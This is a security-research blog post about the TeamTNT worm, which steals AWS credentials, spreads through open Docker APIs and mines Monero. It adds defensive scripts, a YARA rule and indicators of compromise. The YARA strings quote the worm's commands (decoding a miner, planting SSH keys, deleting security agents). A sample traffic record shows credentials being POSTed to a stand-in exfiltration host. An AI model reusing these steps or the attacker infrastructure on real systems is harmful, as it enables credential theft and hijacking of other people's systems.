Team TNT – The First Crypto-Mining Worm to Steal AWS Credentials

August 17, 2020

Over the weekend we’ve seen a crypto-mining worm spread that steals AWS credentials. It’s the first worm we’ve seen that contains such AWS specific functionality. The worm also steals local credentials, and scans the internet for misconfigured Docker platforms. We have seen the attackers, who call themselves “TeamTNT”, compromise a number of Docker and Kubernetes systems.

These attacks are indicative of a wider trend. As organisations migrate their computing resources to cloud and container environments, we are seeing attackers following them there.

Figure 1: The message the TeamTNT worm prints to the screen when first run.

AWS Credential Theft

The AWS CLI stores credentials in an unencrypted file at ~/.aws/credentials, and additional configuration details in a file at ~/.aws/config.

The code to steal AWS credentials is relatively straightforward: on execution it uploads the default ~/.aws/credentials and ~/.aws/config files to the attackers' server, sayhi.bplaced[.]net:

Figure 2: Code to steal AWS credentials from compromised systems.

Curl is used to send the AWS credentials to TeamTNT’s server, which responds with the message “THX”:

Figure 3: The network traffic generated by stolen AWS credentials.

We sent credentials created by CanaryTokens.org to TeamTNT, but have not seen them used yet. This indicates that TeamTNT either assess and use the credentials manually, or that any automation they may have created isn't currently functioning.
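Because the worm simply reads the files the AWS CLI leaves on disk, the first defensive step is knowing which hosts still hold them. The script below is an added example (not Cado's or TeamTNT's code): it walks a set of home directories, parses any ~/.aws/credentials or ~/.aws/config file with the INI parser the AWS CLI format allows, and reports each profile with the key type so stale long-term keys can be removed. The sample credentials file is constructed here and uses the AWS documentation example key id.

```python
"""Inventory AWS credential files left on a host (added example, not from the post).

The AWS CLI writes ~/.aws/credentials and ~/.aws/config as INI files, so
configparser can read them directly.  Long-term IAM user keys begin with
AKIA, temporary STS keys with ASIA; long-term keys on a box that no longer
needs them are the ones worth deleting first.
"""
import configparser
import os
import re
from typing import Dict, List

KEY_ID_RE = re.compile(r"^(AKIA|ASIA)[A-Z0-9]{16}$")

# Constructed sample of a credentials file (documentation example key id).
SAMPLE_CREDENTIALS = """\
[default]
aws_access_key_id = AKIAIOSFODNN7EXAMPLE
aws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY

[ci-temp]
aws_access_key_id = ASIAZZZZZZZZZZZZZZZZ
aws_secret_access_key = EXAMPLEsecretEXAMPLEsecretEXAMPLEsecret1
aws_session_token = EXAMPLEtoken
"""


def classify_key_id(key_id: str) -> str:
    """Coarse key type from the access key id prefix."""
    if not KEY_ID_RE.match(key_id):
        return "unknown-format"
    return "long-term" if key_id.startswith("AKIA") else "temporary"


def parse_credentials(text: str) -> List[Dict[str, object]]:
    """Parse the text of a credentials/config file into per-profile records."""
    parser = configparser.ConfigParser(interpolation=None)  # secrets may contain '%'
    parser.read_string(text)
    profiles = []
    for section in parser.sections():  # '[default]' is an ordinary section here
        key_id = parser.get(section, "aws_access_key_id", fallback="")
        profiles.append({
            "profile": section,
            "key_id": key_id,
            "key_type": classify_key_id(key_id) if key_id else "none",
            "has_secret": parser.has_option(section, "aws_secret_access_key"),
            "has_session_token": parser.has_option(section, "aws_session_token"),
        })
    return profiles


def find_credential_files(home_dirs) -> List[str]:
    """Return the ~/.aws/credentials and ~/.aws/config paths that exist under the given homes."""
    found = []
    for home in home_dirs:
        for name in ("credentials", "config"):
            path = os.path.join(home, ".aws", name)
            if os.path.isfile(path):
                found.append(path)
    return found


def audit_host(home_dirs) -> List[Dict[str, object]]:
    """Locate and parse every AWS credential file under the given home directories."""
    report = []
    for path in find_credential_files(home_dirs):
        with open(path, encoding="utf-8") as fh:
            profiles = parse_credentials(fh.read())
        report.append({"path": path, "profiles": profiles})
    return report


if __name__ == "__main__":
    # Typical home directories on a Linux host; /root is where the worm looks first.
    homes = ["/root"] + [os.path.join("/home", d) for d in os.listdir("/home")] if os.path.isdir("/home") else ["/root"]
    for entry in audit_host(homes):
        for profile in entry["profiles"]:
            print(f"{entry['path']}: profile={profile['profile']} key={profile['key_id']} type={profile['key_type']}")
```

Profiles reported as long-term with no session token are the ones to reconcile against your IAM inventory; if a host has no business calling AWS, the whole file should go, as the conclusion below recommends.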

Proliferation

Most crypto-mining worms are an amalgamation of previous worms, as authors copy and paste their competitors' code. TeamTNT's worm contains code copied from another worm named Kinsing, which is designed to stop the Alibaba Cloud Security tools:

Figure 4: Repurposed code to stop the Alibaba Cloud Security tools.

In turn, it is likely we will see other worms start to copy the ability to steal AWS Credentials files too.

Docker

The worm also includes code to scan for open Docker APIs using masscan, then start new containers and install itself in them:

Figure 5: Code to scan for open Docker APIs, then install the worm in a new container.
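The worm only finds a host if its Docker daemon is listening on the network without client certificate verification. The following added example (not Cado's or Docker's code) audits that configuration from the defender's side: it reads the daemon.json "hosts" list and any -H/--host flags on the dockerd command line, both of which are real Docker settings, and reports every TCP listener that is bound off-loopback and not protected by tlsverify. The daemon.json text and argument lists in the block are constructed samples.

```python
"""Report Docker daemon listeners exposed on the network (added example, not from the post).

Docker's daemon.json takes a "hosts" list such as ["unix:///var/run/docker.sock",
"tcp://0.0.0.0:2375"] and a boolean "tlsverify"; the same can be given on the
dockerd command line with -H/--host and --tlsverify.  A tcp:// listener without
tlsverify accepts unauthenticated API calls from anyone who can reach the port.
"""
import json
from typing import Dict, List
from urllib.parse import urlsplit

LOOPBACK = {"127.0.0.1", "localhost", "::1"}

# Constructed samples: an exposed daemon and a hardened one.
EXPOSED_DAEMON_JSON = '{"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]}'
HARDENED_DAEMON_JSON = '{"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2376"], "tlsverify": true}'


def parse_host_flags(argv: List[str]) -> List[str]:
    """Extract -H / --host values (both '-H x' and '--host=x' forms) from a dockerd argv."""
    hosts = []
    i = 0
    while i < len(argv):
        arg = argv[i]
        if arg in ("-H", "--host") and i + 1 < len(argv):
            hosts.append(argv[i + 1])
            i += 2
            continue
        for prefix in ("-H=", "--host="):
            if arg.startswith(prefix):
                hosts.append(arg[len(prefix):])
        i += 1
    return hosts


def exposed_listeners(daemon_json: str, argv: List[str]) -> List[Dict[str, object]]:
    """Return tcp:// listeners bound off-loopback; severity 'high' when tlsverify is off."""
    config = json.loads(daemon_json) if daemon_json.strip() else {}
    hosts = list(config.get("hosts", [])) + parse_host_flags(argv)
    tls_verify = bool(config.get("tlsverify", False)) or any(
        a in ("--tlsverify", "--tlsverify=true") for a in argv)
    findings = []
    for host in hosts:
        parts = urlsplit(host)
        if parts.scheme != "tcp":
            continue  # unix:// and fd:// sockets are not reachable over the network
        bind = parts.hostname or "0.0.0.0"  # "tcp://:2375" means all interfaces
        try:
            port = parts.port or 2375  # Docker's default plaintext API port
        except ValueError:
            port = None
        if bind in LOOPBACK:
            continue
        findings.append({
            "listen": host,
            "bind": bind,
            "port": port,
            "tls_verify": tls_verify,
            "severity": "info" if tls_verify else "high",
        })
    return findings


if __name__ == "__main__":
    for label, cfg in (("exposed", EXPOSED_DAEMON_JSON), ("hardened", HARDENED_DAEMON_JSON)):
        for f in exposed_listeners(cfg, ["dockerd"]):
            print(f"{label}: {f['listen']} bind={f['bind']} tlsverify={f['tls_verify']} -> {f['severity']}")
```

Note that "tls": true on its own only encrypts the connection; without tlsverify the daemon still accepts any client, which is why the check keys on tlsverify. On a real host, feed the function the contents of /etc/docker/daemon.json and the argv of the running dockerd process, and pair it with the firewall rules recommended in the conclusion.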

Post Exploitation

The worm deploys the XMRig mining tool to mine the Monero crypto-currency and generate cash for the attackers. One of the mining pools they use provides detailed information about the systems the worm has compromised:

Figure 6: The statistics for the Monero wallet (below) on the Monero Ocean mining pool.

This page lists 119 compromised systems, some of which can be identified as Kubernetes Clusters and Jenkins Build Servers.

So far we have seen two different Monero wallets associated with these latest attacks, which have earned TeamTNT about 3 XMR. That equates to only about $300 USD, however this is only one of their many campaigns.

The worm also deploys a number of openly available malware and offensive security tools:

TeamTNT

The worm contains numerous references to “TeamTNT” and the domain teamtnt[.]red. The domain hosts malware, and the homepage titled “TeamTNT RedTeamPentesting” is an odd reference to public malware sandboxes:

Figure 7: The home page for teamtnt[.]red.

Conclusion

Whilst these attacks aren't particularly sophisticated, the numerous groups out there deploying crypto-jacking worms are successful at infecting large numbers of business systems.

Below are some suggestions to help protect them:

  • Identify which systems are storing AWS credential files and delete them if they aren't needed. It's common to find development credentials that have accidentally been left on production systems.
  • Use firewall rules to limit any access to Docker APIs. We strongly recommend using a whitelisted approach for your firewall ruleset.
  • Review network traffic for any connections to mining pools, or using the Stratum mining protocol.
  • Review any connections sending the AWS Credentials file over HTTP.
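The last two recommendations are network-side checks. The block below is an added example (not Cado's code) of the triage logic they describe, run over a handful of constructed traffic records shaped like what a proxy or IDS could hand over (source, destination, port and the first bytes of the payload): it flags Stratum mining sessions by their line-delimited JSON-RPC login/subscribe messages, and flags HTTP POST bodies that carry a credentials-file style access key and secret key pair. The hostnames and the AWS key in the samples are constructed placeholders.

```python
"""Flag Stratum mining sessions and AWS credential files sent over plain HTTP
(added example, not from the post).

Stratum is line-delimited JSON-RPC; a miner's first message is a login (XMRig,
Monero pools) or mining.subscribe/mining.authorize (Bitcoin-style pools).  The
AWS CLI credentials file is INI text with aws_access_key_id and
aws_secret_access_key lines, which is what the worm POSTs with curl.
"""
import json
import re
from typing import Dict, List

STRATUM_METHODS = {"login", "mining.subscribe", "mining.authorize", "submit", "mining.submit"}
AWS_KEY_ID_RE = re.compile(r"aws_access_key_id\s*=\s*(AKIA|ASIA)[A-Z0-9]{16}", re.I)
AWS_SECRET_RE = re.compile(r"aws_secret_access_key\s*=", re.I)

# Constructed records; the exfil host and the key id are placeholders.
SAMPLE_RECORDS = [
    {"src": "10.0.0.5", "dst": "198.51.100.10", "dport": 3333,
     "payload": '{"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"WALLET","pass":"x","agent":"XMRig/6.3.0"}}\n'},
    {"src": "10.0.0.5", "dst": "198.51.100.20", "dport": 80,
     "payload": "GET /index.html HTTP/1.1\r\nHost: www.example\r\n\r\n"},
    {"src": "10.0.0.5", "dst": "198.51.100.30", "dport": 80,
     "payload": ("POST /aws/ HTTP/1.1\r\nHost: exfil.example\r\n"
                 "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
                 "[default]\naws_access_key_id = AKIAIOSFODNN7EXAMPLE\n"
                 "aws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\n")},
    {"src": "10.0.0.6", "dst": "198.51.100.40", "dport": 8080,
     "payload": 'POST /api HTTP/1.1\r\nHost: app.example\r\n\r\n{"method":"getUser","params":[]}'},
]


def looks_like_stratum(payload: str) -> bool:
    """True if the first line of the payload is a Stratum JSON-RPC request."""
    first = payload.split("\n", 1)[0].strip()
    if not first.startswith("{"):
        return False
    try:
        msg = json.loads(first)
    except ValueError:
        return False
    return isinstance(msg, dict) and msg.get("method") in STRATUM_METHODS and "params" in msg


def carries_aws_credentials(payload: str) -> bool:
    """True if the payload contains both an access key id and a secret key line."""
    return bool(AWS_KEY_ID_RE.search(payload) and AWS_SECRET_RE.search(payload))


def triage(records: List[Dict[str, object]]) -> List[Dict[str, object]]:
    """Return the records that match either detection, tagged with an alert name."""
    alerts = []
    for rec in records:
        payload = str(rec["payload"])
        if looks_like_stratum(payload):
            alerts.append({**rec, "alert": "stratum-mining-protocol"})
        elif payload.startswith(("POST ", "PUT ")) and carries_aws_credentials(payload):
            alerts.append({**rec, "alert": "aws-credentials-over-http"})
    return alerts


if __name__ == "__main__":
    for a in triage(SAMPLE_RECORDS):
        print(f"{a['alert']}: {a['src']} -> {a['dst']}:{a['dport']}")
```

Both checks need the payload in the clear: Stratum over TLS and credentials POSTed over HTTPS are invisible to them, so pair this with the destination-based review (known pool hostnames and ports, the domains and IPs listed under Detection below) rather than relying on content inspection alone.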

Previous Work

We would like to credit the previous research on TeamTNT by Trend Micro, Malware Hunter Team and r3dbU7z.

Detection

Yara Rule

rule TeamTNT_Worm_August_2020 {
   meta:
      description = "Detects TeamTNT Worm"
      author = "[email protected]"
      date = "2020-08-16"
      license = "Apache License 2.0"
      hash1 = "3a377e5baf2c7095db1d7577339e4eb847ded2bfec1c176251e8b8b0b76d393f"
      hash2 = "929c3017e6391b92b2fbce654cf7f8b0d3d222f96b5b20385059b584975a298b"
      hash3 = "705a22f0266c382c846ee37b8cd544db1ff19980b8a627a4a4f01c1161a71cb0"
   strings:
      $a = "echo $LOCKFILE | base64 -d > $tmpxmrigfile" wide ascii
      $b = "/root/.tmp/xmrig --config=/root/.tmp/" wide ascii
      $c = "if [ -s /usr/bin/curl ]; then" wide ascii
      $d = "echo 'found: /root/.aws/credentials'" wide ascii
      $e = "function KILLMININGSERVICES(){" wide ascii
      $f = "[email protected]" wide ascii
      $g = "touch /root/.ssh/authorized_keys 2>/dev/null 1>/dev/null" wide ascii
      $h = "rm -rf /etc/init.d/agentwatch /usr/sbin/aliyun-service" wide ascii
      $i = "[email protected]/root/.ssh/id_ed25519.pub" wide ascii
   condition:
      filesize < 100KB and 1 of them
}

Monero Wallets

88ZrgnVZ687Wg8ipWyapjCVRWL8yFMRaBDrxtiPSwAQrNz5ZJBRozBSJrCYffurn1Qg7Jn7WpRQSAA3C8aidaeadAn4xi4k

85X7JcgPpwQdZXaK2TKJb8baQAXc3zBsnW7JuY7MLi9VYSamf4bFwa7SEAK9Hgp2P53npV19w1zuaK5bft5m2NN71CmNLoh

Domain Names

6z5yegpuwg2j4len.tor2web[.]su

dockerupdate.anondns[.]net

teamtntisback.anondns[.]net

sayhi.bplaced[.]net

teamtnt[.]red

healthymiami[.]com (Compromised)

rhuancarlos.inforgeneses.inf[.]br (Compromised)

IP Addresses

129.211.98[.]236

85.214.149[.]236

203.195.214[.]104

File Hashes

3a377e5baf2c7095db1d7577339e4eb847ded2bfec1c176251e8b8b0b76d393f
929c3017e6391b92b2fbce654cf7f8b0d3d222f96b5b20385059b584975a298b
705a22f0266c382c846ee37b8cd544db1ff19980b8a627a4a4f01c1161a71cb0
